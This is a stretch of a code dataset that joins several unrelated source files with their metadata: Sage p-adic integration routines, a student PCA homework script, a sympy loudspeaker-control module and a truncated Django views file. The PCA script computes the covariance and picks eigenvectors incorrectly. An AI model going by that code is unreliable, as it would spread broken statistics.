\"\"\"\n For a non-Weierstrass point $P = (z,\\sqrt(f(z)))$ on the hyperelliptic curve\n $y^2 = f(x)$, returns $(x(t),y(t))$ such that $y(t)^2 = f(x(t))$, where $t = x-z$\n is the local parameter.\n INPUT:\n - $P = (z, \\sqrt(f(z)))$ is a non-Weierstrass point on self\n - prec: desired precision of the local coordinates\n - name: gen of the power series ring (default: 't')\n OUTPUT:\n $(x(t),y(t))$ such that $(y(t))^2 = f(x(t))$ and $t = x -a$ is the\n local parameter at $P$\n AUTHOR:\n - Jennifer Balakrishnan (2007-12)\n \"\"\"\n d = P[1]\n if d == 
0:\n raise TypeError(\"P = %s is a Weierstrass point \"%P)\n pol = self.hyperelliptic_polynomials()[0]\n #L = PowerSeriesRing((P[0]).parent(),name)\n #t = L.gen()\n #L.set_default_prec(prec)\n L = PowerSeriesRing((P[0]).parent(),name, default_prec=prec)\n t = L.gen()\n K = PowerSeriesRing(L, 'x')\n pol = K(pol)\n x = K.gen()\n b = P[0]\n f = pol(t+b)\n for i in range((RR(log(prec)/log(2))).ceil()):\n d = (d + f/d)/2\n return t+b+O(t**(prec)), d + O(t**(prec))\n\n def double_integrals_on_basis_via_teich(self,P,Q):\n \"\"\"\n The integrals $\\int_P^Q w_0 w_0, \\int_P^Q w_0 w_1, ..., \\int_P^Q w_{2g-1} w_{2g-1}$, ,\n computed via Teichmueller points in the discs of $P,Q$\n INPUT:\n - P: non-Weierstrass point on self\n - Q: non-Weierstrass point on self\n OUTPUT:\n The integrals $\\{\\int_P^Q w_i w_j\\}_{i,j= 0,..., 2g-1}$, where $w_i = x^i dx/(2y)$\n EXAMPLES:\n We check against the implementation of double integrals that doesn't use Teichmueller pts:\n sage: R. = QQ['x']\n sage: E = HyperellipticCurve(x^3-4*x+4)\n sage: K = Qp(5,8)\n sage: EK = E.change_ring(K)\n sage: P = EK(2,2)\n sage: Q = EK(1,1)\n sage: EK.double_integrals_on_basis_via_teich(P,Q)\n (2*5^4 + 3*5^5 + 2*5^6 + O(5^8), 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8),\n 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + O(5^7))\n sage: EK.double_integrals_on_basis(P,Q)\n (2*5^4 + 3*5^5 + 2*5^6 + 4*5^8 + O(5^9), 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8),\n 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + 3*5^7 + O(5^8))\n A Fubini-style check that $\\int_P^Q w_i w_j = \\int_Q^P w_j w_i$:\n sage: EK.double_integrals_on_basis_via_teich(Q,P)\n (2*5^4 + 3*5^5 + 2*5^6 + O(5^8), 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8),\n 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + O(5^7))\n sage: EK.double_integrals_on_basis(Q,P)\n (2*5^4 + 3*5^5 + 2*5^6 + 4*5^8 + O(5^9), 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8),\n 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + 3*5^7 + O(5^8))\n AUTHOR:\n Jennifer Balakrishnan\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n A = M_frob.transpose()\n TP = self.teichmuller(P)\n TQ = self.teichmuller(Q)\n g = self.genus()\n d = self.hyperelliptic_polynomials()[0].degree()\n if d%2==1:\n dim = 2*g\n else:\n dim = 2*g+1\n\n TP_to_P_iter = self.tiny_double_integrals_on_basis(TP,P)\n P_to_Q_sing = self.coleman_integrals_on_basis(P,Q)\n TP_to_P_sing = self.tiny_integrals_on_basis(TP,P)\n Q_to_TQ_sing = self.tiny_integrals_on_basis(Q,TQ)\n TP_to_TQ_sing = self.coleman_integrals_on_basis(TP,TQ)\n TQ_to_Q_iter = self.tiny_double_integrals_on_basis(TQ,Q)\n\n ##first find the double integrals between Teichmueller points:\n A_rows = A.rows()\n\n const = []\n xm,ym = self.monsky_washnitzer_gens()\n w = self.invariant_differential()\n for i in range(dim):\n Ai = A_rows[i]\n fi = forms[i]\n for k in range(dim):\n Ak = A_rows[k]\n fk = forms[k]\n p1 = -fk(TP[0],TP[1])*(fi(TQ[0],TQ[1])-fi(TP[0],TP[1]))\n p2 = self.coleman_integral(fi.diff()*fk,TP,TQ)\n p3 = -Ai*fk(TP[0],TP[1])*TP_to_TQ_sing\n if i == k:\n p4 =0\n else:\n p4 = (Ai*vector([self.coleman_integral(xm**l*w*w._coeff.parent()(fk),TP,TQ) for l in range(dim)]) - Ak*vector([self.coleman_integral(xm**l*w*w._coeff.parent()(fi),TP,TQ) for l in range(dim)]))\n p5 = 
fi(TQ[0],TQ[1])*Ak*TP_to_TQ_sing\n const = const + [p1+p2 + p3 + p4 + p5]\n AA = A.tensor_product(A)\n I = identity_matrix(dim**2)\n const = vector(const)\n teich = (I-AA)**(-1)*(const)\n\n ##then correct endpoints\n integrals = []\n for i in range(dim):\n for k in range(dim):\n integrals = integrals + [-TP_to_P_iter[dim*i+k] + teich[dim*i+k] - P_to_Q_sing[i]*TP_to_P_sing[k] - Q_to_TQ_sing[i]*TP_to_TQ_sing[k] + TQ_to_Q_iter[dim*i+k]]\n\n return vector(integrals)\n\n def double_integrals_on_basis(self,P,Q):\n \"\"\"\n The double integrals on basis differentials:\n $\\int_P^Q w_0 w_0, \\int_P^Q w_0 w_1, ..., \\int_P^Q w_{2g-1} w_{2g-1}$\n (via Frobenius)\n INPUT:\n - P: non-Weierstrass point on self\n - Q: non-Weierstrass point on self\n OUTPUT:\n The double integrals\n $\\int_P^Q w_0 w_0, \\int_P^Q w_0 w_1, ..., \\int_P^Q w_{2g-1} w_{2g-1}$, where\n $w_i = x^i dx/(2y)$\n EXAMPLES:\n We check against the implementation that uses Teichmueller points:\n sage: R. = QQ['x']\n sage: E = HyperellipticCurve(x^3-4*x+4)\n sage: K = Qp(5,8)\n sage: EK = E.change_ring(K)\n sage: P = EK(2,2)\n sage: Q = EK(1,1)\n sage: EK.double_integrals_on_basis_via_teich(P,Q)\n (2*5^4 + 3*5^5 + 2*5^6 + O(5^8), 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8),\n 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + O(5^7))\n sage: EK.double_integrals_on_basis(P,Q)\n (2*5^4 + 3*5^5 + 2*5^6 + 4*5^8 + O(5^9), 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8),\n 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + 3*5^7 + O(5^8))\n A Fubini-style check that $\\int_P^Q w_i w_j = \\int_Q^P w_j w_i$:\n sage: EK.double_integrals_on_basis_via_teich(Q,P)\n (2*5^4 + 3*5^5 + 2*5^6 + O(5^8), 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8),\n 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + O(5^7))\n sage: EK.double_integrals_on_basis(Q,P)\n (2*5^4 + 3*5^5 + 2*5^6 + 4*5^8 + O(5^9), 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8),\n 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + 3*5^7 + O(5^8))\n Checking that things are consistent for even degree models:\n sage: R. 
= QQ['x']\n sage: H = HyperellipticCurve(x^6 + 31*x^4 + 31*x^2 + 1)\n sage: K = Qp(13,10)\n sage: HK = H.change_ring(K)\n sage: P = HK(0,1)\n sage: I = HK.coleman_integrals_on_basis(P,HK(1,8))\n sage: J = HK.double_integrals_on_basis(P,HK(1,8))\n sage: I[0]^2/2-J[0]\n O(13^10)\n sage: J[1] + J[5]-I[0]*I[1]\n O(13^10)\n sage: J[2] + J[10] - I[0]*I[2]\n O(13^10)\n sage: J[3] + J[15] - I[0]*I[3]\n O(13^9)\n sage: J[4] + J[20] - I[0]*I[4]\n O(13^9)\n sage: J[6] - I[1]^2/2\n O(13^11)\n sage: J[7] + J[11] - I[1]*I[2]\n O(13^10)\n sage: J[8] + J[16] - I[1]*I[3]\n O(13^9)\n sage: J[9] + J[21] - I[1]*I[4]\n O(13^9)\n sage: J[12] - I[2]^2/2\n O(13^10)\n sage: J[13] + J[17] - I[2]*I[3]\n O(13^9)\n sage: J[14] + J[22] - I[2]*I[4]\n O(13^9)\n sage: J[18] - I[3]^2/2\n O(13^9)\n sage: J[19] + J[23] - I[3]*I[4]\n O(13^8)\n sage: J[24] - I[4]^2/2\n O(13^8)\n AUTHOR:\n Jennifer Balakrishnan (2010-04)\n Jennifer Balakrishnan (2015-04): added functionality for even degree models\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n d = self.hyperelliptic_polynomials()[0].degree()\n dim = d - 1\n if P == Q:\n return vector([0]*(2*dim)**2)\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n p = self.base_ring().prime()\n FP = self.frobenius(P)\n FQ = self.frobenius(Q)\n A = M_frob.transpose()\n A_rows = A.rows()\n g = self.genus()\n const = []\n fix = []\n xm,ym = self.monsky_washnitzer_gens()\n w = self.invariant_differential()\n\n P_to_Q_sing = self.coleman_integrals_on_basis(P,Q)\n\n Q_to_FQ_sing = self.tiny_integrals_on_basis(Q,FQ)\n\n FP_to_P_sing = self.tiny_integrals_on_basis(FP,P)\n\n if P[0].parent() == self.base_ring() and FP[0].parent() == self.base_ring():\n FP_to_P_iter = self.tiny_double_integrals_on_basis(FP,P)\n elif self.residue_disc(P) == self.change_ring(GF(p))(0,1,0):\n print(\"using double integrals in infinite disk\")\n FP_to_P_iter = self.tiny_double_integrals_on_basis_in_infinite_disc(FP,P)\n else:\n return(\"haven't implemented this case yet\")\n FP_to_FQ_sing = FP_to_P_sing + P_to_Q_sing + Q_to_FQ_sing\n\n if Q[0].parent() == self.base_ring() and FQ[0].parent() == self.base_ring():\n FQ_to_Q_iter = self.tiny_double_integrals_on_basis(FQ,Q)\n else:\n print(\"using double integrals in infinite disk\")\n FQ_to_Q_iter = self.tiny_double_integrals_on_basis_in_infinite_disc(FQ,Q)\n\n int_xpowldxfk = [[self.coleman_integral(xm**l*w*w._coeff.parent()(form),P,Q) for l in range(dim)] for form in forms]\n\n if g == 1:\n formsq = [(f**2)/ZZ(2) for f in forms]\n f0f1 = forms[0]*forms[1]\n int_df0f1 = self.coleman_integral(forms[0].diff()*forms[1],P,Q)\n int_dfifk = [formsq[0](Q[0],Q[1]) -formsq[0](P[0],P[1]), int_df0f1 , f0f1(Q[0],Q[1]) - f0f1(P[0],P[1]) - int_df0f1 ,formsq[1](Q[0],Q[1]) -formsq[1](P[0],P[1])]\n fP = [f(P[0],P[1]) for f in forms]\n fQ = [f(Q[0],Q[1]) for f in forms]\n\n for i in range(dim):\n Ai = A_rows[i]\n fi = forms[i]\n for k in range(dim):\n Ak = A_rows[k]\n fk = forms[k]\n fkP = fP[k]\n fiP = fP[i]\n fiQ = fQ[i]\n p1 = -fkP*(fiQ-fiP)\n if g!= 1:\n p2 = self.coleman_integral(fi.diff()*fk,P,Q)\n else:\n p2 = int_dfifk[dim*i + k]\n p3 = -Ai*fkP*P_to_Q_sing\n if i == k:\n p4 =0\n else:\n p4 = (Ai*vector(int_xpowldxfk[k]) - Ak*vector(int_xpowldxfk[i]))\n p5 = fiQ*Ak*P_to_Q_sing\n const = const + [p1+p2 + p3 + p4 + p5]\n fix = fix + [-FP_to_P_iter[dim*i+k] - P_to_Q_sing[i]*FP_to_P_sing[k] - Q_to_FQ_sing[i]*FP_to_FQ_sing[k] + 
FQ_to_Q_iter[dim*i+k]]\n const = vector(const)\n fix = vector(fix)\n AA = A.tensor_product(A)\n v = fix + const\n I = identity_matrix(dim**2)\n return ((I-AA).inverse())*(v)\n\n def tiny_double_integrals_on_basis(self,P,Q):\n \"\"\"\n The tiny double integrals on basis differentials:\n $\\int_P^Q w_0 w_0, \\int_P^Q w_0 w_1, ..., \\int_P^Q w_{2g-1} w_{2g-1}$\n INPUT:\n - P: non-Weierstrass point on self\n - Q: point on self in same disc as P\n OUTPUT:\n the tiny double integrals on basis differentials:\n $\\{\\int_P^Q w_i w_j\\}_{i,j= 0,..., 2g-1}$, where $w_i = x^i dx/(2y)$\n EXAMPLES:\n We check consistency with single Coleman integrals:\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-4*x+4)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK.lift_x(2)\n sage: FP = HK.frobenius(P)\n sage: I = HK.tiny_double_integrals_on_basis(P,FP)\n sage: C = HK.tiny_integrals_on_basis(P,FP)\n sage: I[1]+I[2] == C[0]*C[1]\n True\n sage: I[0] == C[0]^2/2\n True\n sage: I[3] == C[1]^2/2\n True\n An error if points are not in the same disc:\n sage: Q = HK.lift_x(1)\n sage: HK.tiny_double_integrals_on_basis(P,Q)\n Traceback (most recent call last):\n ...\n ValueError: (2 + O(5^8) : 2 + O(5^8) : 1 + O(5^8)) and (1 + O(5^8) : 1 + O(5^8) : 1 + O(5^8)) are not in the same residue disc\n AUTHOR:\n Jennifer Balakrishnan: odd (2010)\n JSB: even (2012)\n \"\"\"\n g = self.genus()\n d = self.hyperelliptic_polynomials()[0].degree()\n if d%2 == 1:\n dim = 2*g\n else:\n dim = 2*g+1\n\n if P == Q:\n return vector((dim**2)*[0])\n try:\n if self.is_same_disc(P,Q) == False:\n raise ValueError(\"%s and %s are not in the same residue disc \"%(P,Q))\n except TypeError:\n pass\n p = self.base_ring().prime()\n integrals = []\n xP,yP = self.local_coord(P)\n single_ints = self.tiny_integrals_on_basis(P,Q)\n I2 = [(xP**j*xP.derivative()/(2*yP)).integral() for j in range(dim)]\n S = PowerSeriesRing(P[0].parent(),names='a')\n a = S.gen()\n I2_vals = [pol(a) for pol in I2]\n x = xP(a)\n y = yP(a)\n for i in range(dim):\n for j in range(dim):\n if j == i:\n integrals = integrals + [((single_ints[j])**2)/2]\n elif j > i:\n I1 = (x**i*(x.derivative())*I2_vals[j]/(2*y)).integral()\n if P[1] != 0:\n integrals = integrals + [I1(Q[0]-P[0])]\n else:\n #weierstrass case: parameter is y-coord\n integrals = integrals + [I1(Q[1])]\n\n else:\n integrals = integrals + [single_ints[j]*single_ints[i]-integrals[(dim)*j+i]]\n return vector(integrals)\n\n def tiny_double_integral_in_infinite_disc(self,i,j,P,Q):\n \"\"\"\n P,Q are points in the infinite disc\n If one of P,Q is the point at infinity, then beware that\n the \"constant term = 0 normalization\" forces some\n unexpected behavior\n INPUT:\n - i, j: nonnegative integers\n - P, Q: points in infinite disc\n OUTPUT: \\int_P^Q x^i dx/2y x^j dx/2y\n EXAMPLES:\n sage: R = QQ['x']\n sage: x = R.gen()\n sage: H = HyperellipticCurve(x**3-3483*x+74358)\n sage: p = ZZ(7)\n sage: deg = ZZ(20)\n sage: prec = 10\n sage: K = Qp(p,prec)\n sage: HK = H.change_ring(K)\n sage: xx,yy = HK.local_coordinates_at_infinity(prec*deg)\n sage: J = K.extension(x**deg-p,names='a')\n sage: a = J.gen()\n sage: HJ = H.change_ring(J)\n sage: P = HJ(xx(a),yy(a))\n sage: Q = HK(63,324)\n sage: S = HK(-9,324)\n sage: b = HK(0,1,0)\n sage: W = HK(27,0)\n sage: I = HK.tiny_integrals_on_basis(b,P)\n sage: J = HK.tiny_double_integrals_on_basis_in_infinite_disc(b,P)\n Things are a little weird if we're working with the tangential\n basepoint at infinity:\n sage: J[0] + O(a^150) - I[0]^2/ZZ(2)\n O(a^150)\n sage: 
J[1] + O(a^150)+ J[2] - I[0]*I[1] ####See explanation above\n 1 + O(a^150)\n sage: J[3] + O(a^150) - I[1]^2/2\n O(a^150)\n But things work how you'd expect if neither point is infinity:\n sage: FP = HK.frobenius(P)\n sage: I = HK.tiny_integrals_on_basis(P,FP)\n sage: J = HK.tiny_double_integrals_on_basis_in_infinite_disc(P,FP)\n sage: J[0] + O(a^150) - I[0]^2/ZZ(2)\n O(a^150)\n sage: J[1] + O(a^150)+ J[2] - I[0]*I[1]\n O(a^150)\n sage: J[3] + O(a^150) - I[1]^2/2\n O(a^150)\n \"\"\"\n K = (P[0]).parent()\n p = K.prime()\n prec = max(Q[0].parent().precision_cap(),P[0].parent().precision_cap())\n xi,yi = self.local_coordinates_at_infinity(prec)\n f = self.hyperelliptic_polynomials()[0]\n I2 = (xi**j*xi.derivative()/(2*yi)).integral()\n #S = K[['u']]\n #u = S.gen()\n #S.set_default_prec(prec)\n S = PowerSeriesRing(K, 'u', default_prec=prec)\n u = S.gen()\n\n g = self.genus()\n Pval = P[0]**g/P[1]\n Qval = Q[0]**g/Q[1]\n I2val = I2(u) - I2(Pval)\n xi = xi(u)\n yi = yi(u)\n I = (xi**i*xi.derivative()*I2val/(2*yi))\n if I.valuation() < 0:\n v = I.valuation()\n c = I.list()[-v-1]\n t = xi.parent().gen()\n I = (I-c*t**(-1)).integral()\n if Pval == 0 and not Qval.is_unit():\n b_to_P = I(Qval)-I(Pval)+c*log(Qval/p**(Qval.valuation()))\n elif Qval == 0 and not Pval.is_unit():\n b_to_P = I(Qval)-I(Pval) -c*log(Pval/p**(Pval.valuation()))\n elif not Qval.is_unit() and not Pval.is_unit():\n b_to_P = I(Qval)-I(Pval) +c*log(Qval/p**(Qval.valuation()))-c*log(Pval/p**(Pval.valuation()))\n else:\n raise ValueError(\"One of Pval or Qval is a unit. Need logs for this.\")\n else:\n I = I.integral()\n b_to_P = I(Qval)-I(Pval)\n return b_to_P\n","sub_path":"hyperelliptic_padic_field.py","file_name":"hyperelliptic_padic_field.py","file_ext":"py","file_size_in_byte":122290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"171036683","text":"#Danny Radosevich\r\n# you cannot use PCA library\r\n#STEPS FROM LECTURE\r\n#Estimate SIGMA_x\r\n#SIG_x = (1/n)(SIG1-n)(Xi-mew)(xi-mew)^T where mew = (1/n) SIG(1-n)x_i\r\n#Apply package to get eigenvectors w\r\n#Also get assosciated values\r\n#eigvals, eigvecs = np.linalg.eig(SIG)\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as mpl\r\n\r\n#\r\ndata = np.genfromtxt('crimerate.csv', delimiter=',')\r\nsample = data[:,0:-1]\r\nlabel = data[:,-1]\r\n[n,p] = sample.shape\r\n\r\n\r\n\r\n# let's learn PCA vectors from the entire sample set (i.e., \"sample\")\r\n# note that label is not used -- therefore PCA is an \"unsuperivsed learning\" technique\r\n# cannot use PCA libraries; can use libraries to find eigenvectors/eigenvalues of a matrix\r\ndef getMew():\r\n n = 0\r\n for x in sample:\r\n n +=1\r\n #print(mew)\r\n #mew = np.asarray(mew)\r\n return (sample.dot(1/n))\r\ndef getSigma():\r\n #stuff und things\r\n mew = getMew()\r\n pca = []\r\n n = 0\r\n line =\"\"\r\n for x in sample:\r\n n += 1\r\n #xmew = x-mew\r\n #print(xmew.shape)\r\n #trans = np.transpose(xmew)\r\n #pca.append(xmew.dot(trans))\r\n xmew = sample-mew\r\n trans = np.transpose(xmew)\r\n sig = xmew.dot(trans)\r\n sig = np.asarray(sig)\r\n return (sig.dot(1/n))\r\n\r\n\r\n\r\n# you will find p number of PCA projection vectors w1, w2, ..., wp\r\n# we stypically store them in a p-by-k matrix \"w\"; each column being one vector\r\n# typically, vectors are sorted in a way that, 1st column is the optimal, 2nd column is the 2nd optimal, etc\r\n# tip: many libraries will automatically sort eigenvectors based on their eigenvalues\r\n#w = 
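# A minimal sketch of that step, assuming `sample` is the n-by-p data matrix
# and `sig` its p-by-p covariance: np.linalg.eig returns eigenvectors as
# *columns* of eigvecs, in no guaranteed order, so sort by eigenvalue first.
#   order = np.argsort(eigvals)[::-1]               # largest eigenvalue first
#   w = eigvecs[:, order]                           # w[:, 0] is the optimal PCA vector
#   scores = (sample - sample.mean(axis=0)).dot(w)  # rows = instances, cols = PCA features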
.....\r\n\r\n#print(getMew().shape)\r\n#print(sample.shape)\r\n\r\nsig = getSigma() #start off by getting our sigma\r\neigvals, eigvecs = np.linalg.eig(sig) #eigvecs is the w vector\r\nprint(eigvals.shape,eigvecs.shape)\r\nprint(np.argmax(eigvals))\r\n#now to utilize w_1 and w_2\r\n# Plot Figure 1 based on w1 and w2\r\nsample_pca_1 = eigvecs[0] # this is a n-by-1 vector; each row is one instance and the value is its projection on w1 (1st pca feature)\r\nsample_pca_2 = eigvecs[1] # same, but projection on w2\r\nprint(sample_pca_1.shape,sample_pca_2.shape)\r\nmpl.plot(sample_pca_1,label=\"w1\")\r\nmpl.plot(sample_pca_2,label=\"w2\")\r\nmpl.title(\"W1 and W2\")\r\nmpl.legend()\r\nmpl.show()\r\nmpl.clf()\r\n\r\n# Plot Figure 2 based on w(p-1) and wp\r\nsample_pca_p_1 = eigvecs[len(eigvecs)-2] # same, but projection on w(p-1)\r\nsample_pca_p = eigvecs[len(eigvecs)-1] # same, but projection on wp\r\n# now plot data distribution based on these two features\r\nmpl.plot(sample_pca_p_1,label=\"w1\")\r\nmpl.plot(sample_pca_p,label=\"w2\")\r\nmpl.title(\"W1 and W2\")\r\nmpl.legend()\r\nmpl.show()\r\n","sub_path":"ml20_hw9/hw9_t2.py","file_name":"hw9_t2.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"222650381","text":"import sympy as sp\nimport numpy as np\nimport sys\nfrom signal_processing import integrate\nfrom signal_processing import differentiate\nfrom signal_processing import differentiate_nofilt\nfrom PHS import lambdify\n\ndef command_output(u,s,Te,Bl,H_susp,H_bob,H_inert,Z_resist,Z_visco,TARGET):\n \n [xi,dtxi,dt2xi,dt3xi] = command_input(u,s,Te,TARGET)\n f = command_func(Te,Bl,H_susp,H_bob,H_inert,Z_resist,Z_visco)\n return f(xi,dtxi,dt2xi,dt3xi),xi\n \ndef command_input(u,s,Te,TARGET):\n \"\"\"\n Calculates all the quantities necessary to design the new command u_flat\n xi is the targetted displacement or acceleration\n \"\"\"\n if TARGET == 'acc':\n s_acc = s*(2*np.pi*40)**2\n dt2xi = s_acc*u\n dt3xi = differentiate(dt2xi,Te)\n dtxi = integrate(dt2xi,Te)\n xi = integrate(dtxi,Te)\n elif TARGET == 'dpt':\n xi = s*u\n dtxi = differentiate_nofilt(xi,Te)\n dt2xi = differentiate_nofilt(dtxi,Te)\n dt3xi = differentiate_nofilt(dt2xi,Te)\n else:\n print ('Error in TARGET option. 
Choose Yes or No.')\n sys.exit(0)\n \n return xi,dtxi,dt2xi,dt3xi\n \ndef command_func(Te,Bl,H_susp,H_bob,H_inert,Z_resist,Z_visco):\n xi = sp.symbols('xi')\n dtxi = sp.symbols('dtxi')\n dt2xi = sp.symbols('dt2xi')\n dt3xi = sp.symbols('dt3xi')\n \n dxH_susp = lambdify([xi],H_susp(xi).diff())\n dx2H_susp = lambdify([xi],dxH_susp(xi).diff())\n Re = Z_resist(xi).diff()\n Rme = Z_visco(xi).diff()\n Le = 1/(H_bob(xi).diff().diff())\n Mm = 1/(H_inert(xi).diff().diff())\n \n dxBl_x = Bl(xi).diff()\n e1 = Bl(xi)*dtxi\n e2 = (Re/Bl(xi))*(dxH_susp(xi) + Rme*dtxi + Mm*dt2xi)\n e3 = Le*((Bl(xi)*(dtxi*dx2H_susp(xi) + Rme*dt2xi + Mm*dt3xi) - dtxi*dxBl_x*(dxH_susp(xi) + Rme*dtxi + Mm*dt2xi))/(Bl(xi)**2))\n return lambdify([xi,dtxi,dt2xi,dt3xi],(e1+e2+e3))\n \ndef fade(time,T,u):\n \"\"\"\n Create a signal f based on time vector t_num such as:\n * f(t_num = 0) = 0 and all its derivatives until order 3\n * f(t_num > T_num) = 1\n This signal f is meant to fade another signal g by doing f.g \n \"\"\"\n t = sp.symbols('t')\n fade_exp = sp.Piecewise((35*(t/T)**4 - 84*(t/T)**5 + 70*(t/T)**6 - 20*(t/T)**7 ,t<= T),(1,True))\n f = lambdify([t],fade_exp)\n fade_num = np.array(list(map(f,time)))\n u_faded = fade_num*u\n return u_faded","sub_path":"flatness.py","file_name":"flatness.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"261217666","text":"import collections\nimport re\nimport json\n\nfrom django.conf import settings as django_settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.urls import reverse\nfrom django.db.models import Count, F, Q, Exists, Case, When, Value, OuterRef, BooleanField\nfrom django.http import HttpResponse, HttpResponseBadRequest, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom tastypie.models import ApiKey\nfrom django_countries import countries\nfrom el_pagination.decorators import page_template\n\nfrom clist.models import Resource, Contest\nfrom clist.templatetags.extras import get_timezones, format_time\nfrom clist.views import get_timezone\nfrom my_oauth.models import Service\nfrom notification.forms import Notification, NotificationForm\nfrom ranking.models import Statistics, Module, Account\nfrom true_coders.models import Filter, Party, Coder, Organization\nfrom events.models import Team, TeamStatus\nfrom utils.regex import verify_regex\n\n\n@page_template('profile_contests_paging.html')\ndef profile(request, username, template='profile.html', extra_context=None):\n coder = get_object_or_404(Coder, user__username=username)\n statistics = Statistics.objects \\\n .filter(account__in=coder.account_set.all()) \\\n .select_related('contest', 'contest__resource', 'account') \\\n .order_by('-contest__end_time')\n\n search = request.GET.get('search')\n if search is not None:\n if search.startswith('problem:'):\n _, search = search.split(':', 1)\n search_re = verify_regex(search)\n statistics = statistics.filter(addition__problems__iregex=f'\"[^\"]*{search_re}[^\"]*\"')\n elif search.startswith('contest:'):\n _, search = search.split(':', 1)\n statistics = statistics.filter(contest__id=search)\n else:\n search_re = verify_regex(search)\n query = Q(contest__resource__host__iregex=search_re) | Q(contest__title__iregex=search_re)\n statistics = statistics.filter(query)\n\n accounts = coder.account_set.select_related('resource').order_by('pk')\n\n context = 
{\n 'coder': coder,\n 'accounts': accounts,\n 'statistics': statistics,\n }\n\n if extra_context is not None:\n context.update(extra_context)\n return render(request, template, context)\n\n\n@login_required\ndef settings(request):\n coder = request.user.coder\n notification_form = NotificationForm(coder)\n if request.method == 'POST':\n if request.POST.get('action', None) == 'notification':\n notification_form = NotificationForm(coder, request.POST)\n if notification_form.is_valid():\n notification = notification_form.save(commit=False)\n if notification.method == Notification.TELEGRAM and not coder.chat:\n return HttpResponseRedirect(django_settings.HTTPS_HOST_ + reverse('telegram:me'))\n notification.coder = coder\n notification.save()\n return HttpResponseRedirect(reverse('coder:settings') + '#notifications-tab')\n\n if request.GET.get('as_coder') and request.user.has_perm('as_coder'):\n coder = Coder.objects.get(user__username=request.GET['as_coder'])\n\n resources = Resource.objects.all()\n coder.filter_set.filter(resources=[], contest__isnull=True).delete()\n\n return render(\n request,\n \"settings.html\",\n {\n \"resources\": resources,\n \"coder\": coder,\n \"services\": Service.objects.all(),\n \"categories\": coder.get_categories(),\n \"notification_form\": notification_form,\n \"modules\": Module.objects.order_by('resource__id').all(),\n },\n )\n\n\n@login_required\ndef change(request):\n name = request.POST.get(\"name\", None)\n value = request.POST.get(\"value\", None)\n\n if value in [\"true\", \"false\"]:\n value = \"1\" if value == \"true\" else \"0\"\n\n user = request.user\n coder = user.coder\n\n if coder.id != int(request.POST.get(\"pk\", -1)):\n return HttpResponseBadRequest(\"invalid pk\")\n if name == \"timezone\":\n if value not in (tz[\"name\"] for tz in get_timezones()):\n return HttpResponseBadRequest(\"invalid timezone name\")\n coder.timezone = value\n coder.save()\n elif name == \"check-timezone\":\n if value not in [\"0\", \"1\", ]:\n return HttpResponseBadRequest(\"invalid check timezone value\")\n coder.settings[\"check_timezone\"] = int(value)\n coder.save()\n elif name == \"time-format\":\n try:\n format_time(timezone.now(), value)\n except Exception as e:\n return HttpResponseBadRequest(e)\n coder.settings[\"time_format\"] = value\n if value == \"\":\n coder.settings.pop(\"time_format\")\n coder.save()\n elif name == \"add-to-calendar\":\n if value not in [\n 'enable',\n 'disable',\n 'iCalendar',\n 'Google Calendar',\n 'Outlook',\n 'Outlook Online',\n 'Yahoo! 
